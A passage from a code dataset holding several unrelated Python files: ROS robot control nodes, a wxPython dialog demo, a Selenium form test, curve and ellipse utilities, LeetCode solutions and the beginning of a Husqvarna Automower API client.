self.release_token(data.data)\n\n def release_token_cb(self, data):\n \"\"\" Deals with incoming token release message.\n\n If necessary claims token and resumes current state machine.\n\n Args:\n data (std_msgs.msg.Int32): priority number of the node to whom token was released\n \"\"\"\n \n if data.data != self._priority:\n return\n \n self._token = True\n self.write_debug(\"Got token\", 1)\n \n if self._paused:\n self.resume_behaviour()\n\n def pause_behaviour(self):\n \"\"\" Pauses the current subprocess \"\"\"\n\n os.kill(self._process.pid, signal.SIGSTOP)\n self._paused = True\n\n self.write_debug(\"Pausing node\", 1)\n\n def resume_behaviour(self):\n \"\"\" Resumes the current subprocess \"\"\"\n\n os.kill(self._process.pid, signal.SIGCONT)\n self._paused = False\n\n self.write_debug(\"Resuming node\", 1)\n\n def set_variable_cb(self, data):\n \"\"\" Deals with incoming set variable msg\n\n If variable exists in cache then the value is updated otherwise it's ignored\n\n Args:\n data (mission_control.msg.Variable): data.name is the variable's name, data.value is the variable's value, data.ttl is variable's validity\n \"\"\"\n\n var_from_own_proc = data.node_name == rospy.get_name()\n\n if var_from_own_proc:\n self._vars_from_own_proc[data.name] = data.value\n\n self.write_debug(\"Setting variable named \" + data.name + \" with value \" + str(data.value) + \" as own variable\", 2)\n\n if data.name in self._cache or (\"_\" + data.name) in self._cache or var_from_own_proc:\n self._cache[data.name] = data.value\n self._var_last_upt[data.name] = rospy.Time.now()\n\n self.write_debug(\"Setting variable named \" + data.name + \" with value \" + str(data.value), 2)\n\n if data.ttl > 0:\n self._var_ttl[data.name] = rospy.Duration.from_sec(data.ttl)\n self.write_debug(\"Setting variable named \" + data.name + \" with time to live \" + str(data.ttl), 3)\n\n def get_variable_cb(self, data):\n \"\"\" Deals with get variable msg\n\n If child process isn't running then node tries to search for the variable\n in child python script.\n\n Otherwise looks, if the requested variable has been set by the child process.\n\n If variable is found by either of these methods, then the variable is set\n using mission_control_utils' function set_var\n\n Args:\n data (std_msgs.msg.String): variable name that is being searched\n \"\"\"\n\n self.check_var(data.data)\n\n if os.path.isfile(self._script) and self.node_not_running():\n found, var = self.find_var(data.data)\n\n if found:\n mission_control_utils.set_var(data.data, var)\n return\n\n elif data.data in self._vars_from_own_proc:\n ttl = None\n\n if data.data in self._var_ttl:\n ttl = self._var_ttl[data.data].to_sec()\n\n mission_control_utils.set_var(data.data, self._vars_from_own_proc[data.data], ttl)\n\n def find_var(self, var_name):\n \"\"\" Tries to find the requested variable from child python file\n that is stored in seld._script variable\n\n Args:\n var_name (string): variable name that is being searched\n\n Returns:\n bool: True if variable was found, False otherwise\n mixed: None, if the variable wasn't found, otherwise variable's value\n \"\"\"\n\n found = False\n variable = None\n self.explored = []\n self.types = [smach.StateMachine]\n\n try:\n state_machine = imp.load_source(str(uuid.uuid1()), self._script)\n except:\n return found, variable\n\n for var in dir(state_machine):\n obj = eval('state_machine.' + var)\n\n if isinstance(obj, type) and obj not in self.types:\n self.types.append(obj)\n\n for var in dir(state_machine):\n obj = eval('state_machine.' + var)\n\n if isinstance(obj, tuple(self.types)):\n found, variable = self.explore_obj(obj, var_name)\n\n if found:\n return found, variable\n\n return found, variable\n\n def explore_obj(self, obj, var_name, cnt=0):\n \"\"\" Explores all objects variables for the requested variable\n\n Args:\n obj (mixed): some user defined class or smach.Statemachine class\n var_name (string): variable name that is being searched\n cnt (int): how deep the recursion is\n\n Returns:\n bool: True if variable was found, False otherwise\n mixed: None, if the variable wasn't found, otherwise variable's value\n \"\"\"\n\n if obj in self.explored or cnt > self.MAX_VAR_SEARCH_RECURSION:\n return False, None\n\n found = False\n found_var = None\n\n self.explored.append(type(obj))\n\n for var in dir(obj):\n var_obj = eval('obj.' + var)\n var_type = type(var_obj)\n\n if var == var_name and var_type in (bool, str, int, long, float):\n return True, var_obj\n\n if var_type is dict:\n found, found_var = self.explore_dict(var_obj, var_name, cnt+1)\n\n if var_type in (list, tuple):\n found, found_var = self.explore_list(var_obj, var_name, cnt+1)\n\n if isinstance(var_obj, tuple(self.types)):\n found, found_var = self.explore_obj(obj, var_name, cnt+1)\n\n if found:\n return found, found_var\n\n return found, found_var\n\n def explore_dict(self, dct, var_name, cnt):\n \"\"\" Searches dictionary for any objects that could be further explored\n\n Args:\n dct (dict): dictionary to be searched\n var_name (string): variable name that is being searched\n cnt (int): how deep the recursion is\n\n Returns:\n bool: True if variable was found, False otherwise\n mixed: None, if the variable wasn't found, otherwise variable's value\n \"\"\"\n\n found = False\n found_var = None\n\n if cnt > self.MAX_VAR_SEARCH_RECURSION:\n return found, found_var\n\n for key in dct:\n obj = dct[key]\n if isinstance(obj, tuple(self.types)):\n found, found_var = self.explore_obj(obj, var_name, cnt+1)\n\n if found:\n return found, found_var\n\n return found, found_var\n\n def explore_list(self, lst, var_name, cnt):\n \"\"\" Searches list for any objects that could be further explored\n\n Args:\n lst (lst): list to be searched\n var_name (string): variable name that is being searched\n cnt (int): how deep the recursion is\n\n Returns:\n bool: True if variable was found, False otherwise\n mixed: None, if the variable wasn't found, otherwise variable's value\n \"\"\"\n\n found = False\n found_var = None\n\n if cnt > self.MAX_VAR_SEARCH_RECURSION:\n return found, found_var\n\n for i in range(0, len(lst)):\n obj = lst[i]\n if isinstance(obj, tuple(self.types)):\n found, found_var = self.explore_obj(obj, var_name, cnt+1)\n\n if found:\n return found, found_var\n\n return found, found_var\n\n def get_var(self, name, def_val=None, counter=0):\n \"\"\" Request given variable's value\n\n First: checks cache, if variable exists there\n Second: if variable is not in cache then searches for it in child python file if the process isn't running\n Third: lastly, if variable is not in node's statemachine, requests variable from all initialized nodes\n\n Args:\n name (string): requested variable's name\n\n Returns:\n mixed: requested variable's value\n \"\"\"\n\n if counter == 0:\n self.check_var(name)\n\n if name in self._cache:\n self.write_debug(\"Found variable named \" + name + \" in cache\", 2)\n return self._cache[name]\n\n if os.path.isfile(self._script) and self.node_not_running:\n found, var = self.find_var(name)\n\n if found:\n self._cache[name] = var\n return var\n\n if counter == 0:\n self._cache[\"_\"+name] = True\n mission_control_utils.publish_get_var(name)\n\n if counter > Constants.MAX_CBS:\n self.write_debug(\"Maximum callbacks for get_var function reached, setting variable named \" + name + \" with default value \" + str(def_val), 2)\n\n self._cache[name] = def_val\n return def_val\n\n counter += 1\n\n self.write_debug(\"Asking for variable named \" + name + \" (\" + str(counter) + \"/\" + str(Constants.MAX_CBS) + \")\", 3)\n\n time.sleep(Constants.VAR_RECHECK_DELAY)\n\n return self.get_var(name, def_val, counter)\n\n\n def check_var(self, name):\n \"\"\"Checks if the variable in cache is new enough or needs to be deleted\n\n Args:\n name (string): variable's name\n \"\"\"\n \n if name not in self._var_ttl or name not in self._var_last_upt:\n return\n\n var_ttl = self._var_ttl[name]\n var_last_upt = self._var_last_upt[name]\n\n if rospy.Time.now() > (var_last_upt + var_ttl):\n self.write_debug(\"Deleting variable named \" + name + \" from cache\", 1)\n\n if name in self._cache:\n del self._cache[name]\n self.write_debug(\"Deleting variable named \" + name + \" from self._cache\", 3)\n\n if \"_\"+name in self._cache:\n del self._cache[\"_\" + name]\n self.write_debug(\"Deleting variable named _\" + name + \" from self._cache\", 3)\n\n if name in self._vars_from_own_proc:\n del self._vars_from_own_proc[name]\n self.write_debug(\"Deleting variable named _\" + name + \" from self._vars_from_own_proc\", 3)\n\n if name in self._var_ttl:\n del self._var_ttl[name]\n self.write_debug(\"Deleting time to live for variable named \" + name + \" from self._var_ttl\", 3)\n\n if name in self._var_last_upt:\n del self._var_last_upt[name]\n self.write_debug(\"Deleting last update time for variable named \" + name + \" from self._var_last_upt\", 3)\n\n def activate(self):\n \"\"\" Activates node \"\"\"\n\n if(os.path.isfile(self._script)):\n cmd = \"exec python %s %d %s\"\n else:\n cmd = \"exec rosrun %s %d %s\"\n\n cmd = cmd % (self._script, self._debug_level, rospy.get_name())\n\n self._process = subprocess.Popen(cmd,shell=True)\n self._running = True\n\n self.write_debug(\"Node activates\", 1)\n\n def deactivate(self):\n \"\"\" Deactivates node \"\"\"\n\n self._running = False\n self._process = False\n\n self.write_debug(\"Node deactivates\", 1)\n\n def node_not_running(self):\n\n return not self._running and not self._process\n\n def kill_process(self):\n \"\"\" Kills the active process \"\"\"\n\n if self._process:\n self._process.kill()\n\n def is_subprocess_alive(self):\n \"\"\" Checks if the subprocess, in which the script runs, is alive \n\n Returns:\n bool: True if subprocess is alive, False otherwise\n \"\"\"\n\n if not self._process:\n return False\n\n self._process.poll()\n alive = self._process.returncode == None\n\n self.write_debug(\"Subprocess is \" + str(alive), 3)\n\n return alive\n\n def node_is_ok(self):\n \"\"\" Publishes message that shows that node is alive \"\"\"\n\n msg = Health()\n msg.node_name = rospy.get_name()\n msg.token = self._token\n\n self.ok_pub.publish(msg)\n\n self.write_debug(\"Publishing node is ok message\", 3)\n \n\n def spin(self):\n \"\"\" Checks if the node is active\n\n If the node is active and not running, activates node\n If the thread ends, deactivates node\n\n On every call sends a message that shows that the node is alive\n\n On startup asks for token as many times as it is defined in variable self.MAX_TOKEN_ASK_TIMES\n \"\"\"\n\n self.node_is_ok()\n\n allowed_to_ask_token = self.ask_token()\n\n self.write_debug(\"mul on token: \" + str(self._token), 3)\n\n if allowed_to_ask_token:\n self.write_debug(\"Node is not allowed to ask token\", 2)\n return\n\n active = self.is_active()\n\n if active and not self._token:\n self.request_token()\n\n if active and self._token and not self._running:\n self.activate()\n elif self._token and self._running and not self.is_subprocess_alive():\n self.deactivate()\n\n def write_debug(self, msg, level):\n \"\"\" Writes node's debug message\n\n Args:\n msg (string): debug message to be printed\n level (int): debug message's level\n \"\"\"\n\n if self._debug_level >= level:\n rospy.loginfo(rospy.get_name() + \" - \" + msg)\n","sub_path":"src/behaviour.py","file_name":"behaviour.py","file_ext":"py","file_size_in_byte":22486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"394574412","text":"# Exercise in using FileDialog.\n\nimport wx, os\n\nclass MyApp(wx.App):\n def OnInit(self):\n self.frame = MyFrame(None, title=\"FileDialog Exercise\")\n self.frame.Show()\n return True\n\nclass MyFrame(wx.Frame):\n def __init__(self, *args, **kwargs):\n super(MyFrame, self).__init__(*args, **kwargs)\n\n # Attributes\n self.file = None\n style = wx.TE_MULTILINE|wx.TE_RICH2\n self.txtctrl = wx.TextCtrl(self, style=style)\n\n # Setup\n self._SetupMenus()\n\n # Layout\n sizer = wx.BoxSizer(wx.VERTICAL)\n sizer.Add(self.txtctrl, 1, wx.EXPAND)\n self.SetSizer(sizer)\n\n # Event Handlers\n self.Bind(wx.EVT_MENU, self.OnOpen, id=wx.ID_OPEN)\n self.Bind(wx.EVT_MENU, self.OnSaveAs, id=wx.ID_SAVEAS)\n self.Bind(wx.EVT_MENU, self.OnExit, id=wx.ID_EXIT)\n self.Bind(wx.EVT_CLOSE, self.OnExit)\n\n def _SetupMenus(self):\n \"\"\"Make the frames menus\"\"\"\n menub = wx.MenuBar()\n fmenu = wx.Menu()\n fmenu.Append(wx.ID_OPEN, \"Open\\tCtrl+O\")\n fmenu.AppendSeparator()\n fmenu.Append(wx.ID_SAVEAS, \"Save As\\tShift+Ctrl+S\")\n fmenu.AppendSeparator()\n fmenu.Append(wx.ID_EXIT, \"Exit\\tCtrl+Q\")\n menub.Append(fmenu, \"File\")\n self.SetMenuBar(menub)\n\n #---- Event Handlers ----#\n\n def OnOpen(self, event):\n \"\"\"Handle Open\"\"\"\n if event.GetId() == wx.ID_OPEN:\n self.DoOpen()\n else:\n event.Skip()\n\n def OnSaveAs(self, event):\n \"\"\"Handle SaveAs\"\"\"\n if event.GetId() == wx.ID_SAVEAS:\n self.DoSaveAs()\n else:\n event.Skip()\n\n def OnExit(self, event):\n \"\"\"Handle window close event\"\"\"\n self.Destroy()\n\n #---- End Event Handlers ----#\n\n #---- Implementation ----#\n\n def DoOpen(self):\n \"\"\"Show file open dialog\"\"\"\n dlg = wx.FileDialog(self,\n message=\"Open a File\",\n style=wx.FD_OPEN, \n defaultDir=os.getcwd())\n if dlg.ShowModal() == wx.ID_OK:\n path = dlg.GetPath()\n self.SetTitle(\"Open \" + path)\n else:\n self.SetTitle(\"Open Dialog Canceled\")\n dlg.Destroy()\n\n def DoSaveAs(self):\n \"\"\"Show SaveAs dialog\"\"\"\n dlg = wx.FileDialog(self,\n message=\"Save As\",\n style=wx.FD_SAVE, \n defaultDir=os.getcwd())\n if dlg.ShowModal() == wx.ID_OK:\n path = dlg.GetPath()\n self.SetTitle(\"Save as \" + path)\n else:\n self.SetTitle(\"Save As Dialog Canceled\")\n dlg.Destroy()\n \n #---- End Implementation ----#\n\n#---- Main Execution ----#\n\nif __name__ == \"__main__\":\n app = MyApp(False)\n app.MainLoop()\n","sub_path":"wxpython/widgets/filedialogs/target_ui.py","file_name":"target_ui.py","file_ext":"py","file_size_in_byte":2871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"475466606","text":"import os\nfrom common.webdriver_factory import create_driver_instance, ROOT_DIR\nfrom pages.demoqa.practice_form import PracticeForm\ntry:\n driver = create_driver_instance('chrome')\n driver.get('chrome://settings/')\n driver.execute_script('chrome.settingsPrivate.setDefaultZoom(0.75);')\n page = PracticeForm(driver,20)\n page.abrir_pagina_web()\n page.esperar_hasta_que_se_cargue_elemento()\n page.set_first_name('Sandra')\n page.set_last_name('Gutierrez')\n page.set_email('ferny.gutierrez@gmail.com')\n page.set_gender('Female')\n page.set_mobile('3003656382')\n page.set_hobbies('Sports')\n page.set_subjects('Maths')\n page.set_subjects('Computer Science')\n page.set_current_address('CRA 17 # 136 - 73')\n page.set_date_of_birth(\"Nov 30 2020\")\n file_path = os.path.join(ROOT_DIR, '.gitignore')\n page.set_file(\"C:\\\\Users\\\\Usuario\\\\Documents\\\\bootcamptest\\\\2020_Python_Selenium-main\\\\.gitignore\")\n page.set_state('NCR')\n page.set_city('Delhi')\n\nfinally:\n driver.cerrar_navegador()","sub_path":"pages/test_practice_from.py","file_name":"test_practice_from.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"148843696","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Aug 1 12:23:36 2019\n\n@author: C176616\n\"\"\"\n#from scipy.interpolate import interp1d\n#import numpy as np\n\nclass Curve():\n '''\n A class that represents a single servopress curve\n \n Attributes\n ----------\n x : array of floats\n individual x points that make up the curve\n y : array of floats\n individual y points that make up the curve\n runID : string\n unique ID for this curve\n \n '''\n def __init__(self):\n self.x = []\n self.y = []\n self.runID = \"\"\n \n def interpolate(self, resolution):\n ''' Interpolates X and Y data to new values\n \n Parameters\n\t\t----------\n resolution : float\n the resolution interpolated to\n \n '''\n xValues = self.x\n yValues = self.y\n interp = interp1d(xValues, yValues, kind='linear', fill_value=\"extrapolate\")\n xNew = np.arange(xValues[0], xValues[len(xValues)-1], resolution)\n yNew = interp(xNew)\n self.x = xNew\n self.y = yNew\n \n def calculateYCrossover(self, leftBound, rightBound, target, upDown):\n ''' finds the X and Y value where the curve crosses a target Y value\n \n Parameters\n ----------\n leftBound : float\n X position where to start search\n rightBound : float\n X position where to stop search\n target : float\n the target Y value to search for\n upDown : string\n either \"up\" or \"down\". Determines which direction the intercept \n should occur\n \n Returns\n -------\n result : int\n either 0 or 1. 0 if no intercept was found, 1 if one was found\n xCoord : float\n the X coordinate closest to the target value\n yCoord : float\n the Y coordinate closest to the target value\n \n '''\n\n result = 0\n xCoord = []\n yCoord = []\n # enumerate through all x coordinates\n for index, xPoint in enumerate(self.x):\n # if within the bounded search region\n if xPoint >= leftBound and xPoint <= rightBound:\n # search bottom to top\n if upDown == \"up\":\n if self.y[index] >= target and self.y[index-1] < target:\n xCoord = xPoint\n yCoord = self.y[index]\n result = 1\n # search top to bottom\n elif upDown == \"down\":\n if self.y[index] <= target and self.y[index-1] > target:\n xCoord = xPoint\n yCoord = self.y[index]\n result = 1 \n return result, xCoord, yCoord\n \n def calculateXCrossover(self, lowerBound, upperBound, target, leftRight):\n ''' finds the X and Y value where the curve crosses a target X value\n \n Parameters\n ----------\n lowerBound : float\n Y position where to start search\n upperBound : float\n Y position where to stop search\n target : float\n the target X value to search for\n leftRight : string\n either \"left\" or \"right\". Determines which direction the intercept \n should occur\n \n Returns\n -------\n result : int\n either 0 or 1. 0 if no intercept was found, 1 if one was found\n xCoord : float\n the X coordinate closest to the target value\n yCoord : float\n the Y coordinate closest to the target value\n '''\n \n result = 0\n xCoord = []\n yCoord = []\n # enumerate through all y coordinates\n for index, yPoint in enumerate(self.y):\n # if within the bounded search region\n if yPoint >= lowerBound and yPoint <= upperBound:\n # search left to right\n if leftRight == \"left\":\n if self.x[index] >= target and self.x[index-1] < target:\n yCoord = yPoint\n xCoord = self.x[index]\n result = 1\n # search right to left\n elif leftRight == \"right\":\n if self.x[index] <= target and self.x[index-1] > target:\n yCoord = yPoint\n xCoord = self.x[index]\n result = 1 \n return result, xCoord, yCoord\n \n def getFinalPosition(self):\n '''\n returns the final point of the curve\n \n Returns\n -------\n [x,y] : array\n array of final x point and final y point\n '''\n return [self.x[len(self.x)-1], self.y[len(self.y)-1]]\n ","sub_path":"RSC/Curve.py","file_name":"Curve.py","file_ext":"py","file_size_in_byte":4858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"11646965","text":"#!/bin/python3\n\nimport time\nimport math\nimport cv2\n\n\nclass ElipseDraw:\n\n def draw_elipse(self, image_dir):\n\n # Timer\n start_time = time.time()\n\n img = cv2.imread(image_dir)\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n blur = cv2.GaussianBlur(gray, (5, 5), 1, 1, 0)\n # blur = cv2.blur(gray, (5, 5))\n\n _, thresh = cv2.threshold(blur, 50, 255, cv2.THRESH_BINARY)\n # _, thresh = cv2.threshold(blur, 127, 255, cv2.ADAPTIVE_THRESH_MEAN_C)\n\n contours, _ = cv2.findContours(thresh, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n\n for cnt in contours:\n try:\n (x, y), (MA, ma), angle = cv2.fitEllipse(cnt)\n except:\n print(image_dir)\n return []\n\n # cv2.ellipse(img, ((x, y), (MA, ma), angle), (0,0,255), 2, cv2.LINE_AA)\n\n end_time = time.time()\n total_time = end_time - start_time\n\n data = [x, y, ma/2, MA/2, angle, total_time]\n end_data = ['%.2f' % elem for elem in data]\n\n # cv2.imwrite(image_dir, img)\n return end_data\n","sub_path":"src/elipse_draw.py","file_name":"elipse_draw.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"620758820","text":"class Solution:\n def maxAreaOfIsland(self, grid):\n \"\"\"\n :type grid: List[List[int]]\n :rtype: int\n \"\"\"\n if grid is None or len(grid) == 0 or len(grid[0]) == 0:\n return 0\n res = 0\n for i in range(len(grid)):\n for j in range(len(grid[0])):\n if grid[i][j] == 1:\n res = max(res, self.bfs(grid, i, j))\n return res\n\n def bfs(self, grid, i, j):\n res = 0\n dx, dy = [1, 0, 0, -1], [0, 1, -1, 0]\n q = collections.deque([(i, j)])\n grid[i][j] = 2\n while q:\n grid_x, grid_y = q.popleft()\n res += 1\n for k in range(4):\n x, y = grid_x + dx[k], grid_y + dy[k]\n if x < 0 or x >= len(grid) or y < 0 or y >= len(grid[0]):\n continue\n if grid[x][y] == 1:\n grid[x][y] = 2\n q.append((x, y))\n return res\n\n\nclass Solution:\n def maxAreaOfIsland(self, grid):\n \"\"\"\n :type grid: List[List[int]]\n :rtype: int\n \"\"\"\n if grid is None or len(grid) == 0 or len(grid[0]) == 0:\n return 0\n res = 0\n visited = set()\n for i in range(len(grid)):\n for j in range(len(grid[0])):\n if grid[i][j] == 1:\n res = max(res, self.dfs(grid, i, j, visited))\n return res\n\n def dfs(self, grid, i, j, visited):\n dx, dy = [1, 0, 0, -1], [0, 1, -1, 0]\n if not (0 <= i < len(grid) and 0 <= j < len(grid[0]) and (i, j) not in visited and grid[i][j]):\n return 0\n visited.add((i, j))\n res = 1\n for k in range(4):\n x, y = i + dx[k], j + dy[k]\n res += self.dfs(grid, x, y, visited)\n return res\n","sub_path":"python/695. Max Area of Island.py","file_name":"695. Max Area of Island.py","file_ext":"py","file_size_in_byte":1823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"178344831","text":"#!/usr/bin/env python\n# license removed for brevity\nimport rospy\nfrom geometry_msgs.msg import Twist\nfrom nav_msgs.msg import Odometry\nfrom tf.transformations import euler_from_quaternion\n\nclass RBKairosMover(object):\n\n def __init__(self, real_robot=False):\n\n if not real_robot:\n self._cmd_vel_topic_name = \"/robot/robotnik_base_control/cmd_vel\"\n self._odometry_topic_name = \"/robot/robotnik_base_control/odom\"\n else:\n self._cmd_vel_topic_name = \"/robot/robotnik_base_control/cmd_vel\"\n self._odometry_topic_name = \"/robot/robotnik_base_control/odom\"\n\n self._movement_class = Twist()\n self._movement_class_stop = Twist()\n self._cmd_vel_pub = rospy.Publisher(self._cmd_vel_topic_name, Twist, queue_size=1)\n\n self._check_cmd_vel_pub()\n\n\n # Odometry subscriber\n self._odom_pose = self._check_odom_ready()\n rospy.Subscriber(self._odometry_topic_name, Odometry, self._odom_callback)\n\n def _check_cmd_vel_pub(self):\n \"\"\"\n Checks that the cmd_vel publisher is available.\n This is vital to be sure that when you publish inside this topic, its reieved.\n :return:\n \"\"\"\n rate = rospy.Rate(10) # 10hz\n while self._cmd_vel_pub.get_num_connections() == 0 and not rospy.is_shutdown():\n rospy.logdebug(\"No susbribers to \"+self._cmd_vel_topic_name+\" yet so we wait and try again\")\n try:\n rate.sleep()\n except rospy.ROSInterruptException:\n # This is to avoid error when world is reseted, time when backwards.\n pass\n rospy.logdebug(self._cmd_vel_topic_name+\" Publisher Ready\")\n\n\n def _check_odom_ready(self):\n odom_value = None\n rospy.logdebug(\"Waiting for \"+self._odometry_topic_name+\" to be READY...\")\n while odom_value is None and not rospy.is_shutdown():\n try:\n odom_value = rospy.wait_for_message(self._odometry_topic_name, Odometry, timeout=0.5)\n rospy.logdebug(\"Current \"+self._odometry_topic_name+\" READY=>\")\n\n except:\n rospy.logerr(\"Current \"+self._odometry_topic_name+\" not ready yet, retrying for getting odom\")\n\n return odom_value.pose.pose\n\n\n def _odom_callback(self, data):\n self._odom_pose = data.pose.pose\n\n def get_x_y_yaw(self, odom_pose):\n \"\"\"\n It gets for us the x, y and yaw form a pose message\n \"\"\"\n x_value = self._odom_pose.position.x\n y_value = self._odom_pose.position.y\n\n orientation_list = [self._odom_pose.orientation.x, self._odom_pose.orientation.y, self._odom_pose.orientation.z, self._odom_pose.orientation.w]\n (roll, pitch, yaw) = euler_from_quaternion (orientation_list)\n\n return x_value, y_value, yaw\n\n\n def check_movement(self, delta_x = None, delta_y = None, delta_angular = None, movement_object= None):\n \"\"\"\n Check that the x,y an dangular values have changes from first call the delta given\n When None this value wont be considered\n delta_x = None\n delta_y = None\n delta_angular = None\n \"\"\"\n x0_value, y0_value, yaw0 = self.get_x_y_yaw(self._odom_pose)\n movement_achieved = False\n rate = rospy.Rate(10) # 10hz\n\n while not movement_achieved and not rospy.is_shutdown():\n rospy.logerr(\"Movement NOT ACHIEVED\")\n\n x1_value, y1_value, yaw1 = self.get_x_y_yaw(self._odom_pose)\n\n if delta_x:\n xdelta_value = x1_value - x0_value\n rospy.loginfo(\"xdelta_value=\"+str(xdelta_value))\n if delta_x >= 0:\n # Positive value\n delta_x_ok = (xdelta_value >= delta_x)\n else:\n # Negative Value\n delta_x_ok = (xdelta_value <= delta_x)\n else:\n delta_x_ok = True\n\n if delta_y:\n ydelta_value = y1_value - y0_value\n rospy.loginfo(\"ydelta_value=\"+str(ydelta_value))\n if delta_y >= 0:\n # Positive value\n delta_y_ok = (ydelta_value >= delta_y)\n else:\n # Negative Value\n delta_y_ok = (ydelta_value <= delta_y)\n else:\n delta_y_ok = True\n\n\n if delta_angular:\n yaw_delta_value = yaw1 - yaw0\n rospy.loginfo(\"yaw_delta_value=\"+str(yaw_delta_value))\n if delta_angular >= 0:\n # Positive value\n delta_angular_ok = (yaw_delta_value >= delta_angular)\n else:\n # Negative Value\n delta_angular_ok = (yaw_delta_value < delta_angular)\n else:\n delta_angular_ok = True\n\n # We check if movement achieved\n movement_achieved = delta_x_ok and delta_y_ok and delta_angular_ok\n\n try:\n self._cmd_vel_pub.publish(movement_object)\n rate.sleep()\n except rospy.ROSInterruptException:\n # This is to avoid error when world is reseted, time when backwards.\n pass\n\n if movement_achieved:\n rospy.loginfo(\"Movement Achived, Stopping\")\n self._cmd_vel_pub.publish(self._movement_class_stop)\n else:\n rospy.logerr(\"Movement NOT ACHIEVED\")\n \n\n return movement_achieved\n\n\n\n def move_in_square_omni(self):\n \"\"\"\n Move RB-Kairos in a square\n \"\"\"\n\n def move_rbkairos(self,dir, distance, l_speed=0.2, a_speed=0.5):\n\n lin_x = 0.0\n delta_x_distance = None\n lin_y = 0.0\n delta_y_distance = None\n ang_z = 0.0\n delta_angular_distance = None\n\n if dir == \"forwards\":\n lin_x = l_speed\n delta_x_distance = distance\n elif dir == \"backwards\":\n lin_x = -1*l_speed\n delta_x_distance = -1*distance\n elif dir == \"left\":\n lin_y = l_speed\n delta_y_distance = distance\n elif dir == \"right\":\n lin_y = -1*l_speed\n delta_y_distance = -1*distance\n elif dir == \"turn_right\":\n ang_z = a_speed\n delta_angular_distance = distance\n elif dir == \"turn_left\":\n ang_z = -1*a_speed\n delta_angular_distance = -1*distance\n else:\n rospy.logerr(\"Movement not supported\")\n\n\n self._movement_class.linear.x = lin_x\n self._movement_class.linear.y = lin_y\n self._movement_class.angular.x = ang_z\n\n \n self.check_movement(delta_x = delta_x_distance,\n delta_y = delta_y_distance,\n delta_angular = delta_angular_distance,\n movement_object = self._movement_class)\n \n\n\n\ndef odometry_check_test():\n rospy.init_node('talker', anonymous=True)\n rbkairos_movement = RBKairosMover()\n square_side = 1.0\n rbkairos_movement.check_movement(delta_x=square_side)\n rbkairos_movement.check_movement(delta_x=-1*square_side)\n rbkairos_movement.check_movement(delta_y=square_side)\n rbkairos_movement.check_movement(delta_y=-1*square_side)\n rbkairos_movement.check_movement(delta_angular=1.57)\n rbkairos_movement.check_movement(delta_angular=-1.57)\n\n\ndef move_square_test():\n rospy.init_node('talker', anonymous=True, log_level=rospy.DEBUG)\n rbkairos_movement = RBKairosMover()\n\n square_side = 0.5\n\n rbkairos_movement.move_rbkairos(dir=\"forwards\", distance=square_side)\n rbkairos_movement.move_rbkairos(dir=\"left\", distance=square_side)\n rbkairos_movement.move_rbkairos(dir=\"backwards\", distance=square_side)\n rbkairos_movement.move_rbkairos(dir=\"right\", distance=square_side)\n\n\nif __name__ == '__main__':\n try:\n move_square_test()\n except rospy.ROSInterruptException:\n pass","sub_path":"test_drives/src/omni_drive.py","file_name":"omni_drive.py","file_ext":"py","file_size_in_byte":8017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"130102374","text":"\"\"\"Automower library using aiohttp.\"\"\"\nimport logging\nimport time\nfrom urllib.parse import quote_plus, urlencode\n\nimport aiohttp\n\n_LOGGER = logging.getLogger(__name__)\n\n\nAUTH_API_URL = \"https://api.authentication.husqvarnagroup.dev/v1/oauth2/token\"\nTOKEN_URL = \"https://api.authentication.husqvarnagroup.dev/v1/token\"\nAUTH_HEADERS = {\n \"Content-Type\": \"application/x-www-form-urlencoded\",\n \"Accept\": \"application/json\",\n}\n\nMOWER_API_BASE_URL = \"https://api.amc.husqvarna.dev/v1/mowers/\"\n\ntimeout = aiohttp.ClientTimeout(total=10)\n\n\nclass TokenError(Exception):\n \"\"\"Raised when Husqvarna Authentication API request ended in error 400.\"\"\"\n\n def __init__(self, status: str):\n \"\"\"Initialize.\"\"\"\n super().__init__(status)\n self.status = status\n\n\nclass TokenRefreshError(Exception):\n \"\"\"Raised when Husqvarna Authentication API is not able to refresh the token (Error 400 or 404).\"\"\"\n\n def __init__(self, status: str):\n \"\"\"Initialize.\"\"\"\n super().__init__(status)\n self.status = status\n\n\nclass TokenValidationError(Exception):\n \"\"\"Raised when Husqvarna Authentication API token request ended in error 404. The reason might be an invalid token or that a refresh is needed\"\"\"\n\n def __init__(self, status: str):\n \"\"\"Initialize.\"\"\"\n super().__init__(status)\n self.status = status\n\n\nclass GetAccessToken:\n \"\"\"Class to get an acces token from the Authentication API.\"\"\"\n\n def __init__(self, api_key, username, password):\n \"\"\"Initialize the Auth-API and store the auth so we can make requests.\"\"\"\n self.username = username\n self.password = password\n self.api_key = api_key\n self.auth_data = urlencode(\n {\n \"client_id\": self.api_key,\n \"grant_type\": \"password\",\n \"username\": self.username,\n \"password\": self.password,\n },\n quote_via=quote_plus,\n )\n\n async def async_get_access_token(self):\n \"\"\"Return the token.\"\"\"\n async with aiohttp.ClientSession(headers=AUTH_HEADERS) as session:\n async with session.post(AUTH_API_URL, data=self.auth_data) as resp:\n _LOGGER.debug(\"Resp.status get access token: %i\", resp.status)\n if resp.status == 200:\n result = await resp.json(encoding=\"UTF-8\")\n result[\"expires_at\"] = result[\"expires_in\"] + time.time()\n if resp.status >= 400:\n raise TokenError(\n f\"The token is invalid, respone from Husqvarna Automower API: {resp.status}\"\n )\n result[\"status\"] = resp.status\n return result\n\n\nclass RefreshAccessToken:\n \"\"\"Class to renew the Access Token.\"\"\"\n\n def __init__(self, api_key, refresh_token):\n \"\"\"Initialize the Auth-API and store the auth so we can make requests.\"\"\"\n self.api_key = api_key\n self.refresh_token = refresh_token\n self.auth_data = urlencode(\n {\n \"client_id\": 